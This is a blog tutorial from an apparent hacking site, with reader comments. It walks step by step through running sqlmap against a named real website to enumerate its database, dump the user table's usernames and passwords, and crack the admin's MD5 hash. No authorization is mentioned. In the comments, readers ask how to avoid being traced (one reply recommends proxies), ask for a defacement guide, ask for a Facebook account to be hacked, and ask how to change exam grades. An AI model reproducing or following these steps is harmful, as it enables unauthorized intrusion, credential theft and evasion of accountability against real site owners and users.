Pages

SQL Injection Attack by BackTrack 5


Hello Viewer, Now i am come again with my new thread. You like my old post  Hack Facebook,Gmail,Yahoo and Twitter Account by BT5  so thanks for it. Now i am going to write my new tutorial in Backtrack Series.

I think you would know or hear about SQL Injection, IF you say "YES" so it's is good or else you say "NO" so please read about it by my old post...




I think my old tutorial is too good and also very helpful for a Newbie. Here i will going to tell you only How to Doing SQL INJECTION  Attacks by BackTrack 5.

So Follow my steps and done it successfully!!!!

NOTE: IF you face some problem in viewing the picture clear,so open the picture in new tab.


STEP1: Below pic show you a website which name is www.junincc.com.ar ,Now i am used my Backtrack Skill and find that website Admin name and password.





STEP2: Open your BackTrack Terminal and Write "cd /pentest/web/scanners/sqlmap"   and Hit Enter Key like below pic...




STEP3: Now i am going to find out Website DataBase name,so for it write...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 --dbs


For Example see below pic...




STEP4: When you done step 3 then you see after sometime processing a list of DataBase name come like below pic in which all name under RED color ring...



Now choose any DataBase name for Forward Processing.In my case,i am select "junincc_junincc".


STEP5: After select DB name now write on forward step...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc --tables


i am write these command for find tables name under DataBase junincc_junincc  see below pic...





STEP6: When you have done step 5 then you see a list of tables come,In my case you see below pic where tables name in under of RED color ring....




Now here i am select "usuarios" for find out columns name by Tables.





STEP7: For Find Columns name of any Table write below command...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios  --columns


See below pic...




STEP8: When you have done step 7 then you found a list of Table's columns,see below pic all columns name in table  usuarios write in RED color ring...




Here i am select two Columns name for future work which name is " clave , usuario " .



STEP9: Now i am going to find about columns information which save in column "clave , usuario" ,so run these command......

python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios  -C clave,usuario --dump


See below pic...






STEP10: When you run step 9 command then in some steps it ask for forward processing show you write "Y"  and press ENTER KEY,see below pic...





STEP11: Wait for some time then you see result like below pic...





Here "admin" is the ADMIN account ID Name and password encrypt in MD5 ,For Decrypt it go to online MD5 Decryption Website and Decrypt the Password of Admin site.


I hope u will be successful in your work,so all the BEST!



IF YOU LIKE MY WEBSITE SO PLEASE FOLLOW IT AND MAKE ME STRONG FOR FUTURE,THANKS!!!!!

14 comments:

  1. Kamal Sinha said...:

    You are really awesome man,i like your all thread and also waited for future post,and be happy when see a new also g8t post by you.Your work done amazing and also very helpful for a newbie.Like old sql injection post it is also too good.Thanks for it and your hard work for us.

  1. Anonymous said...:

    Very nice post,tell u after try it@

  1. Justin knew said...:

    Very nice snap and also every steps too broad.

  1. Vipin Verma said...:

    Very informative post,so thank for it.

  1. Anonymous006 said...:

    Very attractive post and too simple compare to old method.

  1. bypasserako said...:

    nice tutorial bro,keep it coming,tnx and godbless : )

  1. Sartaj Agelus said...:

    Nice Post I appreciate it !!!
    I want to know that suppose we have done any injection on any website and website Owner/Admin come to know some way that some one has injected my database/website will he able to tarce back the guy who has hacked the website

  1. ajai singh said...:

    Hello Sartaj,

    Ya by help of Server Admin he got ur IP so use Proxy or Tunnel becoz digital condom must for this.

  1. Anonymous said...:
    This comment has been removed by a blog administrator.
  1. Anonymous said...:

    Hey,is there any tutorial about how to change any data on any website ? because I want to try to hack my facebook game to get virtual money. .

  1. Anonymous said...:

    Hello, Im TaM. Im Great Pakistani Hacker. Im using Backtrack since 2006. I cant understand sqlninja. What to do with it in backtrack. If you make a tutorial and inform me i will be Grateful.
    Here's my Email,
    xtam4@hotmail.com
    Or Contact me on Ubers
    xtam4
    Hacksociety?
    xtam4.
    ========================================================================
    If you could do more for me. Then make a DEFACE tutorial.

  1. Anonymous said...:

    please hack this facebook account: https://www.facebook.com/profile.php?id=100002467761449

    Thanks, why hack? HE HACKED MY GMAIL AND YMAIL

  1. sarath sarath said...:

    thank u admin.. i dont know about hacking.. but now i'm very much intrested in learning about that.. bcas i have 9 arears.. so i tried to learn more about hacking.. u may ask me a question that if i had tried to learn my subject i would have pass.. my problem is i dont know nd dont like to do maths nd accounts.. i just want to change it to just pass only.. how to hack without geting cought to webhost..

  1. Anonymous said...:

    No such file or directory? can somebody please help me

Post a Comment

Related Posts Plugin for WordPress, Blogger...

Hackarde's Search Engine- Search Hacking Tutorial,Tool and eBook

Loading
 
HACKARDE © 2011 | Designed by HrDe